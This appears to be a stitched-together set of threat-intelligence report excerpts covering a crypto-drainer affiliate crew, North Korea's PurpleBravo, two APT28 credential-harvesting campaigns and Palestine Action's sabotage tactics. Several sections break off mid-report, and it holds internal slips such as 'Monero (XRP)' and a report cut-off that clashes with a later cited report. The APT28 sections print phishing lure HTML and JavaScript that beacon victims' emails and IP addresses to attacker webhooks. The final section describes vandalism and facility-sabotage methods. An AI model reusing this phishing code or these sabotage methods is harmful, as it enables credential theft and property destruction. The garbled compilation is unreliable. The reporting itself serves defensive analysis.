Executive Summary

Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.

This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.

Key Findings

• The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.
• As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.
• Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.
• The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.
• The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion

Executive Summary

PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.

Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.

Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.

PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.

Key Findings

• PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.
• PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.
• Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.
• Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.
• PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.

The analysis cut-off date for this report was September 11, 2025

Executive Summary

Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report.

Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.

BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.

BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.

Key Findings

• BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.
• The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.
• Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.
• BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.
• Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.

Microsoft OWA Credential Harvesting

On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in Figure 1.

Figure 1: OWA login-themed credential-harvesting page (Source: Recorded Future)

BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL hxxps://shorturl[.]at/Be4Xe. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.

The initial webhook in this campaign differs from those previously reported by Inskit Group; instead of hosting the credential-harvesting page, it uses HTML to load a PDF lure document into the victim's browser for two seconds before redirecting to a second webhook, as per Figure 2.

<html>
  <head>
    <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width">
        <meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
  </head>
  <body>
    <object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
  </body>
</html>

Figure 2: HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)

The PDF lure document, shown in Figure 3, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”

Figure 3: Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)

After the PDF lure has displayed for two seconds, the page redirects to a second webhook located at the URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, which hosts a spoofed OWA login page as shown in Figure 1. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.

As shown in Figure 4, BlueDelta has added a new hidden HTML form element used to store the current page's URL. The HTML element is populated using JavaScript at page load, as shown in Figure 5, and is later used to capture victim information when the page opens and credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need for manual addition of the exfiltration URL to credential-harvesting pages.

Figure 4: Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)

<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>

Figure 5: JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)

The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “u=” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to /owa/ to imitate a legitimate OWA login page.

When the HTML form is submitted, a JavaScript function named myFunction captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in Figure 6.

The analysis cut-off date for this report was July 30, 2025

Executive Summary

Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.

Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.

BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.

Key Findings

• BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.
• The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.
• BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.
• Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.
• The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.

Background

BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.

Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.

Technical Analysis

On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.

Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)

The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the domain and fixed a high port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as per Figure 2.

Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)

The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.

At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.

The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.

BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.

var respIP=$.getJSON('hxxps://httpbin[.]org/ip');

Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)

Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.

On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.

The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.

In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.

Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.

On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.

Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)

Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)

During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.

Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages

(Source: Recorded Future)

Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:

• doads[.]org
• in[.]run
• t[.]ly
• tiny[.]cc
• tinyurl[.]com
• linkcuts[.]com

In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:

Executive Summary

Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.

Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.

Key Findings

• Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
• Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
• The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
• The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
• In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.

Palestine Action: History and Terrorism Designation

Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.

Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”

The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.

Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)

The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.

Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.

However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”

Figure 2: Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)

Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.

Palestine Action’s Tactics, Techniques, Procedures, and Targets

Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.

Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.

Direct Action TTPs

Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:

• Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
• Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
• Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
• Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
  • If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
  • If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.

Vandalism

Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.

These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”

Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)

Obstruction

Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.

Figure 4: Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source: BBC)

Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.

Figure 5: Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)

Sabotage

Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.

